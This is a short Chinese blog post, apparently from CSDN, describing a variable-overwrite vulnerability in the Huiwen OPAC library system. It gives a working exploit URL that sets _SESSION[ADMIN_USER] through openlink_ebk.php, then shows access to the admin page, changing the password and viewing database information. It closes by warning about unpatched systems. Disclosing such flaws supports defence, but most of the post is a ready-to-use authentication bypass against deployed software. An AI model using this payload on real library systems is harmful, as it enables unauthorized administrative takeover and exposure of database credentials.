这是汇文OPAC很早就存在的一个严重漏洞
补充漏洞信息参考来源https://www.seebug.org/vuldb/ssvid-90722
1. 利用存在该漏洞参数的链接,访问存在漏洞文件,并覆盖 session 值
http://*******/opac/openlink_ebk.php?_SESSION[ADMIN_USER]=opac_admin
2.直接访问后台地址
http://********/admin/cfg_basic.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190809141521506.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwNjY5OTc2,size_16,color_FFFFFF,t_70)
3.后台可直接修改密码
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190809141915731.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwNjY5OTc2,size_16,color_FFFFFF,t_70)
数据库信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190809141945172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwNjY5OTc2,size_16,color_FFFFFF,t_70)
4.总结
系统不更新的危害太大了,变量覆盖在此处的危害及其严重。